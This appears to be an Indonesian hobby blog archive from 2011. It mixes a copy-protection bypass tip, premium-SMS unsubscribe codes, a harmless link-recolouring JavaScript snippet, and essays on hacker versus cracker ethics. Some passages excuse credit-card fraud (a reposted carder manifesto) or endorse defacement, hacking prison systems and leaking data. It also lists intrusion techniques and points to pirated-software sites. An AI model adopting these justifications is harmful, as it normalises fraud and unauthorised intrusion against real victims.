- Klick Tab "Alat"
- Pilih Pengaturan
- Pilih Tab Isi
- Hilangkan tanda centang pada "Aktifkan Javascript"
- Klick OK
Jumat, 21 Oktober 2011
Tips Copy Di Blog "Yang Tidak Bisa Di Copy"
Kamis, 20 Oktober 2011
Cara Unreg SMS Sedot Pulsa
Kasus pulsa hilang yang di akibatkan dari sms premium semakin lama semakin meresahkan. Tidak sedikit pengaduan yang terus datang melaporkan berkurangnya pulsa mereka yang terus menerus. Padahal mereka tidak merasa telah mendaftar ke layanan premium. Lain halnya jika memang merasa pernah mendaftar pada satu layanan berlangganan.
Akibatnya banyak masyarakat yang kecewa akan layanan operator. Karena setiap sms premium itu diterima, pulsa kita pasti akan tersedot sekitar Rp. 2.000 hingga Rp. 5.000. Permasalahannya, bagaimana kita akan menyetop pengiriman sms premium tersebut sedangkan kita belum pernah melakukan registrasi ataupun tidak diberi tahu bagaimana cara unreg sms sedot pulsa itu.
Berikut ini saya akan share cara berhenti berlangganan dari beberapa nomor sms premium. Daftar nomor dibawah ini saya dapatkan dari berbagai sumber.
Cara Unreg SMS Sedot Pulsa
Pengirim : 9400
UnReg : UNREG GOLD
Call Center : 02127924179Pengirim : 9388
Unreg : OFF
Call Center : 0217371800Pengirim : 9866
Unreg : UNREG UNTUNG
Call Center : 0217201478Pengirim : 9788
Unreg : UNREG JAPengirim : 9898 / 9090
Unreg : UNREG GAMEPengirim : 2680
Unreg : UNREG atau OFFPengirim : 7575
Unreg : STOP SUBS
Demikian sedikit informasi bagaimana cara unreg sms sedot pulsa dengan harapan dapat bermanfaat bagi para pembaca yang mampir di blog ini. Dan jika kalian mempunyai informasi tambahan tentang cara unreg SMS sedot pulsa ini, bisa dishare di form komentar dibawah.
Sabtu, 15 Oktober 2011
Salahkah Jika Kita Memilih Jalan Kita Sendiri?
Hidup ini adalah sebuah pilihan bagi kita, benar kan kawan?
Namun kadang banyak orang yang mengkritik kita dengan apa yang kita pilih.
Lantas, salahkah jika kita memilih jalan kita sendiri? Walaupun berbeda dari mereka yang lainnya, walau dikatakan oleh mereka bahwa jalan yang kita pilih adalah jalan kejahatan dan kelam.
Karena jujur saja kawan, saya memilih jalan sebagai "Hacker" dalam kehidupan saya sendiri.
Bagaimana menurut kalian? Terima kasih atas respon-responnya
Tutorial cara membuat Facebook warna warni
Hidup Itu Penuh Warna...!!!
Tapi...
Bosan Melihat Warna Facebook Gitu-gitu trus?
Saya akan berbagi sedikit pengetahuan :
1. Hapus semua tulisan yang ada pada ADDRESS BAR
2. Copy dan paste-kan script dibawah ini pada ADDRESS BAR halaman Facebook anda :
Code:
javascript:i=0;c=["red","green","blue","yellow","magenta","orange"," pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',1);void(0); alert("wtf666")
3. Kemudian tekan tombol ENTER
4. Jika muncul tulisan "wtf666" maka itu berarti anda berhasil dan klik "OK"
Semoga bermanfaat :D
Viva Viva Carder Indonesia !!
Bahwa sesungguhnya di dunia ini tidak ada yang sempurna..... Carder adalah sebuah peran dari sederet status sosial di dunia ini. Seorang anak manusia yang butuh penghargaan untuk sebuah harga diri yang tekoyak dan tercoreng oleh sebuah aktivitas.... Tidak adakah tempat di hati para manusia untuk seorang carder ? Begitu sucikah seseorang yang mengagungkan kebenaran dan kejujuran ? Sedemikian hinakah seorang carder Indonesia dan carder - carder di dunia ini di mata para penyandang kebenaran ? Kami carder Indonesia tidak rela disebut sebagai maling, penipu, etc....etc.... karena yang kami lakukan tidak lebih dari sebuah permainan kecepatan tangan dalam memasukkan nomor - nomor kartu kredit, serta beberapa faktor keberuntungan. Apa yang kami lakukan merupakan hal yang wajar sebagai imbas dari kemajuan teknologi informasi di planet bumi ini. Carder bukan penjahat pasar, bukan pula penipu rakyat.... Carder adalah carder !! Terlepas dari intervensi berbagai opini yang membingungkan dari berbagai pihak. Carder, cracker, hacker, phreaker, tidak akan pernah bisa terhapus dari dunia ini, hanya karena menutup situs ini.... VIVA VIVA INDONESIAN CARDER !!!!
Hacker and Himself
Cuma sekedar catatan kecil buat iseng nunggu buka puasa hehehe
selamat membaca ^_^
1.
Waktu cewek gue ngadu kalau FB nya di hacked orang, yang gue lakuin bukan lantas ngehack balik tuh orang melainkan masang sistem keamanan ganda dilaptop cewek gue dan modifikasi sistem security FB nya. Ngebales serangan tsb dengan cara yg sama cuma wasting-time, bakal nunjukin kalau gue gk beda jauh sama tuh orang, punya kemampuan dibawah standar trus ngisengin orang. (Kalau gue yg jadi ceweknya, gue bakal nyalihin cowok gue yang gagal memproteksi account FB gue!!!).
2.
Sial website pribadi gue dihacked, trus berusaha giat untuk pembalasan dendam. Dont be stupid!!!, yang harus dilakukan adalah membangun sistem keamanan baru dengan mempelajari kelemahan-kelemahan yang berhasil ditembus penyerang. Cyber War is not such a stupid thing, it's about how to raising your ability and knowledge through experience, your enemies are those people who mastery the informations, keep them as secret and put so much restriction on internet freedom. Musuhmu adalah hasrat untuk menjaili orang lain dan melakukan tidakan-tindakan negatif untuk kepentingan pribadi merugikan orang lain.
3.
Gak pernah ngisengin komputer `tetangga.' Kenapa mesti menjadikan orang `awam' teknologi sebagai kobran, sama sekali gk ada tantangannya dan gak bertanggungjawab. Kalian cuma membuang-buang waktu mengerahkan kemampuan untuk hal-hal iseng dan gk berguna. Dengan mengobrak-abrik privacy orang lain, hacker tidak jauh berbeda dengan wartawan2 gosip di TV2. Gue lebih milih nebus pertahanan JESTOR, Google Books, etc buat dapetin buku and artikel yang bisa gue bagi-bagiin ke kawan2 cyber. Lebih milih bikin hidden account baru diperpustakaan2 Universitas beken di dunia macem Cambridge, Harvard, ANU, MIT, supaya bisa ngakses informasi-informasi cerdas dan berguna buat ningkatin kemampuan.
Hacker and Society
4.
Masih ada yang nanya gimana cara nge-deface web pribadi org lain and masih ada yg nanya gimana cara nyuri password FB, Yahoo, etc org lain, dont be silly you idiot!!! Tujuannya Cuma buat iseng and nguji kemampuan, what a pity. Silahkan uji kemampuan kawan sendiri dengan permittion, kalian bisa belajar banyak dari membangun persekawanan yang positif, and keep on your track. Kalau emang mau disebut keren ikutin gaya hacker gaul Inggris yang nge-deface lebih dr 300 website dan nyisipin pesan anti nuklir, that was awasome!
5.
Cari duit gratis, ngumpulin dolar and belanja pake kartu kredit orang (even bukan punya orang Indonesia) you're not a hacker, you're a muger!! You stupid carder!!. Apa bedanya sama mencuri or ngerampok. Setiap kejahatan diakumulasi dan gk ada satu hal pun yang tidak meperoleh ganjaran kelak. Gak ada cerita carder jadi kaya terus hidup seneng dengan hasil jarahannya, yang ada jadi penghuni penjara. Kalau Anonops berhasil dengan memberi pelajaran untuk VISA, om dan Paypal, yang mereka lakukan adalah memberi pelajaran tentang prinsip keberpihakan capital pada kekuasaan konspirasi dan memperjuangkan Internet Freedom.
6.
Pihak Rektorat dalam waktu dekat akan mengumumkan kebijakan baru yang mewajibkan mahasiswa memenuhi kehadiran dikelas 90 % untuk syarat lulus MK dan minimal grade C. Gak ada cara lain selain nge-hack website kampus, gue pilih site defacement dengan menyusupkan pesan kalau kecerdasan seseorang gak bisa diukur dari kehadiran dikelas sementara mereka jauh lebih bisa mengeksplorasi pengetahuan dan skill diluar wajib absensi.
7.
Salah satu produk `kondom' mempromosikan produk barunya dengan membagi-bagi secara bebas produknya di jalan-jalan dan melakukan poling diwebsite yang isinya mengukur tingkat partisipasi generasi muda dalam penggunaan pengaman dalam hubungan seksual mereka. STUPID, MORON!!! Kampanye merusak generasi MUDA untuk mendorong mereka melakukan seks bebas, GET LOST YOU KONDOM!!!
Hacker and Politics
8.
Pengadilan yang isinya mafia-mafia rakus duit ngejatuhin hukuman ke bokap gue karena dituduh spionase pemerintah. Kekuasaan konspirasi akhirnya ngebawa bokap ngedekem di penjara padahal yang gue tahu beliau adalah aktivis politik yang sesungguhnya berteriak untuk keadilan dan kesejahtraan rakyat dengan mengkritisi penguasa. Hack sistem keamanan penjara yang terkomputerisasi!!!! Kantor-kantor polisi yang korup!! dan pengadilan yang `mucikari' alias pelacur hukum kelas elit (Plus..hack hidup dan matinya para koruptor, kejar mereka sampe pintu neraka, musnahkan dan buat mereka melebur di dunia maya!!! Gantung Gayus pake kabel Optik trus kubur jasad busuknya di selat Jawa, siapa tahu akses internet lebih baik)
9.
Ganyang Malaysia!! Kampanye hacker Indonesia yang sesungguhnya mengibarkan bendera perang. Hacking politik (Hacktivism) adalah suatu tindakan dimana kemajuan teknologi dalam hal kemampuan teknis komputer digunakan untuk menyisipkan pesan-pesan humanity (kemanusiaan) -anti penindasan anti totalitalitarian, global justice, HAM dan dunia masa depan yang damai tanpa perang tanpa nuklir, bukan sentimen nasionalisme dengan mengibarkan bendera perang seolah menguji kemampuan siapa yang lebih hebat. Menjadi anak muda yang nasionalis adalah mereka yang terus belajar dan siap mengerahkan kemampuannya untuk menghancurkan `kebodohan' anak-anak bangsa, mereka yang siap mengkontribusikan kemampuannya untuk memajukan dunia IT tanah air dan mengkampanyekan melek teknologi sampai ke pedalaman.
10.
Waktu lagi surfing bebas gue nemuin titik kelemahan sistem keamanan komputer badan inteligen satu negara penguasa yang menjadi arus komunikasi lintas dunia. Intinya mereka sedang mengembangkan senjata nuklir untuk menciptakan tatanan dunia masa depan dibawah kekuasaan negara-negara rakus. leack datanya dan kirim ke wikileaks (Hahaha…kalau yg ini beresiko tinggi hanya dilakukan oleh yang berpengalaman :) dont try this at your computer!!!).
Catatan: Dilarang keras memprotes artikel ini, dilarang keras tersinggung dengan kontent artikel ini dan dilarang keras meng-hack penulis artikel ini... :))
Asal Mula Sebutan HACKER
Istilah Hacker sendiri lahir sekitar tahun 1959 dari MIT(Massacusetts Institute of Technology), sebuah universitas di Amerika yang terdiri dari orang-orang cerdas namun cenderung tidak mempercayai adanya Tuhan (Atheis). Saat itulah semua berawal, dari sebuah ruangan baru, "EAM room" pada Building 26 MIT, sebuah tempat yang merupakan nenek moyang dari "dunia baru" yang kini kita kenal, tempat nenek moyang sebuah mesin yang kini kita sebut sebagai "komputer", mesin yang mampu membawa kita menuju kelebihbaikan dengan kebebasan informasi, dunia para Hacker sejati.
Para Hacker selalu bekerjasama secara sukarela menyelesaikan masalah dan membangun sesuatu. Mereka selalu berbagi informasi, memberi jawaban serta berlomba-lomba untuk berbuat yang terbaik agar dihormati di lingkungannya. Mereka tidak pernah berhenti belajar untuk menjadi ahli dan sangat anti untuk melakukan sesuatu berulang-ulang dan membosankan. Mereka berpedoman pada kata-kata bijak : “Untuk mengikuti jalan - pandanglah sang ahli - ikuti sang ahli - berjalan bersama sang ahli - kenali sang ahli - jadilah sang ahli.”
Sementara itu, para cracker sibuk untuk memuaskan diri mereka dengan aktivitas cracking. mulai dari membobol komputer, menebar virus (tanpa tujuan - beberapa Hacker sejati ada yang menulis virus namun dengan tujuan yang jelas), hingga mengakali telepon (Phreaking). Para Hacker menyebut mereka sebagai orang malas yang tidak bertanggung jawab. Jadi, sangat tidak adil jika kita tetap menganggap bahwa Hacker itu jahat dan menakutkan karena sangat jelas bahwa Hacker bersifat membangun sementara cracker bersifat membongkar.
Ingin jadi seorang Hacker?? Tidak ada kata sulit bagi mereka yang mau belajar. Untuk menjadi seorang Hacker anda harus menguasai beberapa bahasa pemrograman dan tentu saja sikap-sikap yang bisa membuat anda diterima di lingkungan mereka. Biasanya calon Hacker memulai dengan belajar bahasa [Python] karena bahasa ini tergolong bahasa pemrograman yang termudah. Bahasan mengenai bahasa ini bisa anda lihat di www.python.org. Setelah itu anda juga harus menguasai [java] yang sedikit lebih sulit akan tetapi menghasilkan kode yang lebih cepat dari Python, [C], [C++] yang menjadi inti dari UNIX, dan [Perl] (www.perl.com) serta [LISP] untuk tingkat lanjut.
Setelah menguasai semua kemampuan dasar diatas, calon Hacker disarankan untuk membuka salah sati versi UNIX open-source atau mempelajari LINUX, membaca kodenya, memodifikasi dan menjalankannya kembali. Jika mengalami kesulitan, disarankan untuk berkomunikasi dengan club pengguna Linux (www.linpeople.org).
Sisi menarik dari seorang Hacker adalah dimana mereka saling bahu-membahu dalam menyelesaikan sebuah masalah dan membangun sesuatu. Tetapi sayangnya, kehidupan mereka yang menghabiskan 90% waktunya untuk aktivitas Hacking bukanlah hal yang baik. Kalau memang benar-benar ingin jadi Hacker, jadilah Hacker yang baik.
Perbedaan Hacker & Cracker. Siapa yang baik, & Siapa yang jahat?
Hacker !!!! siapakah dirimu? Memang sampai sekarang masih banyak orang yang salah mendefinisikan arti hacker dan cracker. Yah, sebagian besar orang mungkin menganggap hacker dan cracker adalah sama yaitu seorang kriminal karena banyak melakukan kejahatan di dunia cyber. Kalau kedua istilah itu punya arti yang sama, maka pasti ada yang salah dengan pendefinisian keduanya.
Lalu, dimana letak kesalahan dari pendefinisian kedua istilah yang kerap hinggap ditelinga kita ini? Apalagi semenjak ada kabar bahwa "KPU-online" dibobol oleh para "hacker" beberapa bulan kebelakang, atau bahkan baru-baru ini situs "POLRI" & "Lemhannas" juga dikabarkan telah dibobol oleh seorang hacker. Benarkah itu adalah pekerjaan seorang hacker? Atau pekerjaan seorang cracker?
Tulisan ini mencoba menjawab dua istilah yang tidak asing ditelinga kita tersebut dengan wacana seorang pembelajar murni. Artinya, saya bukan dari kedua golongan tadi. Walaupun pada akhirnya menjadi tertarik untuk sekedar tahu aktifitas mereka (para hacker & cracker) sebagai satu ilmu yang menarik dalam dunia IT beberapa tahun ini.
PERSOALAN DASAR
Hacker dalam tulisan Eric Steven Raymond adalah "there is a community, a shared culture, of expert programmers and networking wizards that its history back trough decades to the firs time-sharing minicomputers and the earliesr ARPAnet experiment"
Dengan kata lain, Raymon mengatakan, "the members of this culture originated the term 'hacker'". Para hackerlah yang kemudian memperkenalkan internet, membuat program sistem operasi UNIX hingga bisa digunakan saat ini. Dan para hacker pula lah yang telah berjasa dalam menjalankan World Wide Web (www) sehingga dapat dinikmati oleh semua orang di seluruh dunia di belahan manapun dia berada asal terkoneksi pada internet.
Lebih lanjut Raymon mengatakan "jika anda berada pada komunitas ini dan jika anda memiliki konstribusi didalamnya, dan kemudian orang mengenal anda sebagai hacker, maka anda adalah seorang hacker".
Sekilas dari pandangan Raymon kita dapat satu definisi bahwa seorang hacker bukanlah orang yang jahat seperti yang kita pikirkan selama ini. Ya, jika mereka memang bisa masuk kedalam komputer kita (malalui jaringan internet) karena mereka bisa menguasai ilmunya. Namun jika ada orang yang kemudian masuk secara ilegal kedalam komputer kita dan kemudian "mencuri dan mengacak-ngacak" data kita, mereka adalah CRACKER. Dan bisa jadi mereka adalah seorang hacker dalam dunia yang berbeda. Dengan kata lain, mereka semua adalah para ahli dalam hal teknologi informasi ini dan berkecimpung serius didalamnya.
Namun untuk menghindari kerancuan, maka sebuah kata kunci dalam masalah ini, menurut Raymon adalah perbedaan antara keduanya; seorang Hacker adalah dia yang membangun sistem, sementara seorang Cracker malah "menghancurkannya". (How to become a hacker, Eric S. Raymond, 2001).
Kapan istilah hacker menjadi trend sebagai sebuah kejahatan yang menakutkan? Tidak lain karena "dosa" pakar film di hollywood yang membiaskan istilah hacker dan cracker ini. Banyak film yang mengangkat tema hacker dalam sebuah bentuk "penghancuran sistem informasi" yang seharusnya makna itu diterapkan pada seorang cracker.
Sebut misalnya film The Net (1995), Take Down (1999). Film tersebut mengangkat tema hacker untuk menyebut cracker.
Dan dari kesalah penafsiran tadi, hingga kini pun istilah hacker masih dibiaskan dengan istilah cracker. Kerancuan itu tidak hanya terjadi di Indonesia saja, bahkan di luar negeripun pandangan terhadap keduanya sama seperti itu.
Terminologi hacker muncul pada awal tahun 1960-an diantara anggota organisasi mahasiswa Tech Model Railroad club di Lab Kecerdasan Artifisial Masschusetts Institute Of Teknology (MIT). Istilah hacker awalnya bermakna positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer dengan lebih baik ketimbang yang ada sebelumnya (Memahami karakteristik Komunitas Hacker: Studi Kasus pada Komunitas Hacker Indonesia, Donny B.U, M.Si)
MENJADI HACKER
Mungkin sekilas tentang definisi di atas cukup untuk membatasi sejauh mana peranan seorang hacker dan cracker itu. Tulisan ini tidak akan mengangkat sejarah hacker dan awal mula kerancuannya. Namun lebih menitik beratkan pada bagaimana seandainya kita belajar menjadi hacker. Atau lebih spesifik, bisakah kita menjadi seorang hacker?
Dalam tulisan How to Become a Hacker, Eric Steven Raymon mengatakan bahwa menjadi hacker tidaklah segampang yang dikira. Langkah awal untuk menjadi seorang hacker haruslah menguasai minimal 5 bahasa pemrograman yang ada. Ia menyebut bahasa pemrograman C/C++, Java, Perl, Phyton & LISP. Selain itu mampu berinteraksi dengan program HTML untuk dapat membangun komunikasi dengan jaringan internet. Semua dasar diatas adalah ilmu yang "wajib" dimiliki jika kita memang berminat untuk menjadi seorang hacker sejati. Karena pada dasarnya menjadi Hacker adalah penguasaan terhadap membaca dan menulis kode.
Kenapa kode? Karena memang komputer yang kita jalankan setiap hari pada intinya adalah terdiri dari berbagai kode instruksi yang cukup rumit.
Selain penguasaan terhadap bahasa pemrograman diatas, kita pun harus punya bekal yang cukup dalam berbahasa inggris untuk dapat saling bertukar pikiran dengan komunitas hacker dari seluruh dunia. Ini tidak dilarang karena pada umumnya, mereka (anggota komunitas tersebut) memiliki kode etik tersendiri tentang open-source atau kode-kode program yang boleh dibuka dan diutak atik oleh orang lain. Contoh, kode-kode Linux yang marak di perkenalkan baru-baru ini memiliki konsep open source dan karenanya bisa dimiliki oleh khalayak ramai dengan sebutan free software.
Kembali pada persoalan diatas, menjadi seorang hacker untuk tujuan saling berbagi ilmu dalam teknologi informasi ini, atau dalam arti yang lebih luas untuk memudahkan pemakai komputer pada masa yang akan datang, bukanlah hal harus ditakuti. Sebaliknya, ilmu tersebut harus diterjemahkan dan sama-sama digali sehingga menjadi bagian terintegral dalam memahami lika-liku dunia cyber. Asal saja kita tidak terjebak pada prilaku yang negatif sehingga menjadi seorang cracker yang membobol sitem rahasia orang lain.
PERBEDAAN HACKER DAN CRACKER
a) HACKER
- Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
- Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
- Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.
b) CRACKER
- Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Sebagian contoh : Virus, Pencurian Kartu Kredit, Kode *****, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server.
- Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus clickBCA.com yang paling hangat dibicarakan tahun 2001 lalu.
Sudah jelas yang sebenarnya orang jahat itu adalah cracker bukan hacker seperti kebanyakan pendapat orang.
Di sisi ini menarik untuk di simak, satu sisi, kita butuh teknologi canggih yang kerap bermunculan dalam hitungan detik, sisi lain ada kekhawatiran takut terjebak pada pola "nyeleneh" yang berakibat patal. Namun demikian, sebagai satu sikap, kita berpijak pada satu kesepakatan, bahwa mempelajari bahasa-bahasa yang ditawarkan oleh Eric Steven Raymon diatas, adalah hal yang baik. Karena dengan mempelajarinya, kita minimal dapat mendapat solusi untuk membuat program yang berguna bagi orang lain. Dan jika ini dilakukan, percayalah, anda adalah seorang hacker.
Tekhnik dan seni Hacking
File Inclusion
- Shares misconfiguration
- SQL Injection
- DNS attack through social engineering
- Web Server external module intrusion
- Attack against the administrator/user (password stealing/sniffing)
- FTP Server intrusion
- Web Server intrusion
- Remote administrative panel access through password guessing
- Access credentials through Man In the Middle attack
- Telnet Server intrusion
- Rerouting after attacking the Router
- DNS attack through cache poisoning
- Other Web Application bug
- RPC Server intrusion
- Remote administrative panel access through social engineering
- Rerouting after attacking the Firewall
- SSH Server intrusion
- URL Poisoning
- Remote service password guessing
- Other Server intrusion
- Mail Server intrusion
- Remote administrative panel access through bruteforcing
- Remote service password bruteforce
itu sudah berurutan klo gak salah menurut penelitian pengamat sekuriti
so..jangan terpaku oleh satu teknik saja, masih banyak yang harus kita eksplorasi lebih jauh, kawan!
Mencoba Menjadi Hacker yg Baik :=))
Menjadi hacker mungkin adalah salah satu cita-cita orang belajar komputer dan internet. Tetapi apa sebenarnya hacking, dan apa saja yang harus dilakukan untuk menjadi seorang hacker yang baik. Tulisan berikut akan memberikan petunjuk langkah per langkah bagaimana anda belajar. Petunjuk ini cocok juga untuk pemakai internet awal untuk bagaimana mencari informasi di Internet, mencari serial number, membaca artikel security serta tata cara bertanya yang baik disuatu forum diskusi.
Setelah membaca artikel ini walaupun anda membatalkan cita-cita anda, menimal anda telah mengerti pekerjaan berat apa yang harus dilakukan oleh seorang yang ingin menjadi hacker.
Akhirnya selamat membaca.
Salam,
Berto Sang Pemimpi.........^_^
--------------------------------------------------------------------------------
Untuk siapa saja tulisan ini
Tulisan ini ditujukan untuk siapa saja yang tertarik dengan hacking, atau ingin tahu apa yang dimaksud dengan hacking, dan juga bermanfaat bagi siapa saja yang ingin menambah wawasannya tentang komputer dan internet.Petunjuk ini ditujukan untuk tingkat pemula.
Tolong Beritahukan kepada saya bagaimana menjadi seorang hacker
Oh... tidak. Saya rasa anda terlalu banyak nonton film, atau salah pengertian tentang internet, dan berpikiran bahwa melakukan hacking adalah sangat menarik dan saya rasa hal tersebut adalah wajar saja. Kemudian, anda akan bertanya "Ajari saya bagaimana melakukan hack" atau "Bagaimana saya dapat melakukan hack terhadap situs ini". Anda adalah seorang yang panas-panas tahi ayam dan pasti akan diabaikan, dan semua orang akan memanggil anda sebagai lamer, dll ... dan hal ini juga hal yang wajar saja.
Jadi, moral dari cerita tersebut adalah : Sebelum anda bertanya "bagaimana saya dapat menjadi seorang hacker" adalah anda harus mengetahui pekerjaan berat apa yang harus anda lakukan, apa yang dimaksud dengan hacking, dll. Jadi petunjuk ini adalah langkah-langkah yang akan mengajari anda begaimana untuk belajar akan hal tersebut.
Baiklah, tetapi saya tidak mengerti.. apakah itu lamer dan newbie ?
Secara definisi tidak ada. Oleh karena itu adalah dua kata yang berbeda untuk mereka. Anda bingung tentang siapa itu newbie, lamer atau apa artinya "elite", "warez d00d", "script-kiddie" dan "wanna-be"? Mungkin anda tentu saja tidak mengerti apa yang anda baca . Tulisan ini akan menjelaskan hal ini apa ini dan apa itu:
* The Jargon File: http://www.tuxedo.org/~esr/jargon/jargon.html
* Hacker Stages: http://www.elfqrin.com/docs/HackerStages.html
Uhm.. mengapa mereka mengabaikan saya?
Pelajaran 1: Sebelum melakukan posting ke forum tertentu, baca dahulu aturan dan faq forum dari tersebut. Mengapa anda harus? Baiklah, sebagaimana anda ketahui, FAQ adalah singkatan dari frequently asked questions (pertanyaan-pertanyaan yang sering ditanyakan), dan mereka telah bosan akan hal tersebut, kemudian mereka meletakan jawaban di FAQ. Percaya atau tidak, pertanyaan seperti "ajari saya memasuki account hotmail pacar saya" adalah pertanyaan yang paling sering di tanyakan. Maka, jika anda tidak membaca faq, bukan saja anda yang kelihatan seperti idiot, tetapi anda juga menghabiskan waktu orang lain .. maka:
Aturan 1: Baca aturan pada forum. baca FAQ pada forum. Baca dua kali.
Aturan 2: Setelah benar-benar membaca aturan 1, jangan lihat yang lain dekat caps lock.
Ini juga petunjuk yang baik tentang "bagaimana melakukan posting supaya tidak diabaikan" ditulis oleh Raven, baca di http://www.securitywriters.org
Jadi, bagaimana kira-kira saya mendapatkan jawaban tersebut
Uhmm.. setiap orang tahu tentang yahoo.com, dan hampir setiap orang tahu tentang altavista.com. Jadi internet merupakan suatu jaringan yang sangat BESAR, maka orang menganggap usaha mencari menjadi sesuatu yang penting, sehingga mereka membuat suatu yang disebut dengan SEARCH ENGINES. Jadi, haruskah anda mencari jawan pertanyaan anda sendiri ? Ya anda harus melakukannya. Adalah sangat mungkin pertanyaan yang sama pernah ditanyakan orang lain, dan telah pula dijawab oleh yang lain, jadi gunakanlah search engine untuk pertanyaan seperti "Belajar C++". Masuk ke google.com, ketik pada kotak pencarian "Belajar C++". Sebelum belajar bagaimana melakukan pemrograman, anda mesti tahu untuk apa bahasa pemrograman tersebut, jadi carilah "What is C++". Perhatikan point-point yang ada? Sehingga Anda tidak menyebabkan orang lain melakukan hal yang sama berulang-ulang, melainkan mencari jawaban untuk diri sendiri. Ini merupakan praktek yang baik, jadi anda tidak perlu mencari orang yang dapat menjawab pertanyaan anda, karena sudah pernah ada di Internet, dan anda tinggal mencarinya.
Aturan 3: Gunakan search engine (google.com)
Aturan 4: Gunakan directori (dmoz.org, yahoo.com)
Tetapi situs tersebut tidak memenuhi keinginan saya?
Hmm.. Jika anda mencari search engine yang baik tentang security
* http://astalavista.box.sk
atau security portal yang baik
* http://neworder.box.sk
* http://securityfocus.com
* http://packetstorm.securify.com
Hmm.. Saya tidak suka membaca. Apakah ada saran lain?
Tidak ada. Anda harus banyak membaca. Hal ini adalah keharusan, karena: membaca = ilmu pengetahuan, ilmu pengetahuan = pengertian dan kebijaksanaan. Anda perlu pengertian dan kebijaksanaan untuk menjadi seorang hacker. Sederhananya, jika anda tidak suka membaca, hentikan membaca ini sekarang juga.
Jadi, apa yang anda rekomendasikan saya untuk dibaca?
Saya merekomendasikan anda membaca segala sesuatu yang anda temukan.
* http://neworder.box.sk
* http://blacksun.box.sk
* http://www.securitywriters.org
* http://www.phrack.com
* http://www.elfqrin.com/hack
* http://www.attrition.org --- tulisan ini sangat "panjang*
Uhh.. Siapa itu seorang hacker ? Apa itu hacking?
Ohh, mudah.
* Baca essay "Being Hacker" dan "Open Letter to a wannabe hacker" oleh Elf Qrin dari hacking lab essays
* Baca "The Hacker How-to" oleh Eric S. Raymond dari tuxedo.
Sangat menarik, ajari saya bagaimana melakukan hack
Baca hacking faq yang ada disana .. anda tidak membaca url yang telah saya berikan sebelumnya bukan ? Ketika anda mengerti bahwa pertanyaan ini tidak *berarti* banggalah atas diri anda. Jika anda masih melakukan post pertanyaan ini, baca dari awal petunjuk ini.
Bagaimana saya belajar programming?
Anda dapat membaca pada
* http://code.box.sk
untuk mendapatkan ide yang jelas tentang setiap bahasa. Jangan lupa untuk memeriksa tutorial dari "situs lain". Perlu diketahui bahwa, cara mendownload source-code dan melakukan kompilasi copy/paste TIDAK mengajari anda apa-apa... Jika anda rasa susah mencari source code, pergi ke:
* http://www.sourceforge.net
hal ini akan membuat anda sibuk sesaat.
Ahem, Saya menanyakan serial number dan tidak ada yang menjawab..
Hal ini tidak ada kaitannya dengan security. Ini adalah alasannya, dan anda tidak membaca aturan forum. Memakai software bajakan adalah ilegal, tetapi jika anda ingin memakainya, jangan tanyakan hal tersebut pada forum 'umum', jadi cari http://www.astalavista.com.
Anda punya saran?
Tentu saja.
+ Jangan menjawab kepada orang yang panas-panas tahi ayam karena hanya membuang waktu anda dan mereka.
+ Jangan membuang waktu dengan membaca pesan pada setiap forum. Bacalah beberapa yang berguna saja seperti Slashdot.org
+ Gunakan web board atau irc sebagai pilihan terakhir untuk mendapatkan informasi.
+ Jangan mengunakan scripts / program kecuali anda tahu apa yang anda lakukan.
+ Jangan mengikuti arus, seperti:
* Jangan katakan produk Microsoft tidak baik kecuali anda telah siap untuk menjawab pertanyaan "Mengapa Visual C++ lebih buruk dibandingkan dengan Borland C++ builder?"
* Jangan katakan "Linux lebih baik" jika anda tidak bisa menjawab "mengapa linux lebih baik" disamping open-source, lebih stabil, cepat, dan aman, serta kelihatan lucu.
* Jangan katakan "Menggunakan GUI tidak lebih baik, gunakan saja command line". Mengetik dengan command tidak membuat l33t. lebih cepat dari pada gui.
* Jangan berkata "Ini [program / cara / script / situs / atau yang lainnya ] lebih baik " tanpa mencoba yang lain. Bagaimana anda tahu sesuatu lebih baik tanpa mencoba setiap pilihan?
Jangan percaya setiap yang anda baca. Jangan merusak situs web orang lain. Bagaimana perasaan anda jika seseorang bermain-main dengan meletakkan gambar porno sebagai wall paper pada anak komputer anda perempuan anda yang berumur 6 tahun? atau jika hardisk yang berisi data penting anda terformat ?
Hmm, Saya tidak ada waktu...
Tidak ada masalah, menjadi pemakai biasa dapat juga bergembira. Bye bye.
Apakah anda seorang hacker?
Tidak.
Mengapa saya harus percaya sama anda?
Anda tidak perlu percaya sama saya .. atau semua orang yang tidak menanyakan hal tersebut. Jika anda merasa yang anda baca masuk akal, gunakan, jika tidak hanya untuk mengetahuinya
Apakah loe pantas disebut hacker ?? sadar woi !!!
Malam-malam iseng ga tau mau ngepost apaan. Gue cuma pengen ngebantu neng gue yang katanya mau belajar bikin blog. Walau ga bisa bantu banget, karena sense of art gue juga nol. Namun gue coba bantu sedikit demi sedikit agat semangat neng gue ngeblog selalu tumbuh.
Lagi jalan-jalan sembari ngaskus, gue nemuin postingan dari ID P.l.a.y.b.o.y yang gue rasa cukup menusuk dan menyindir perilaku beberapa temen gue yang terkadang dengan bangga mengaku "I am A Hacker". Padahal, baru bisa deface sebuah situs. Dan itupun karena dapat bocoran bugs baru dari sebuah forum underground. Namun kalau ditanya beberapa konsep dasar komputer. Jawabnya cuma ada dibuku dan lupa. Memang teman yang aneh. :-)
Oke, Setelah gue minta ijin ke sang TS. gue langsung copy ke blog gue yang berantakan ini dengan tujuan sharing. Mudah-mudahan setelah baca tulisan ini, temen-temen yang tadinya besar kepala hanya karena baru bisa deface sebuah situs menjadi sadar. Dan mari kita bangkit bersama untuk membantu memajukan bangsa ini walau hanya lewat tulisan sepele. :-)
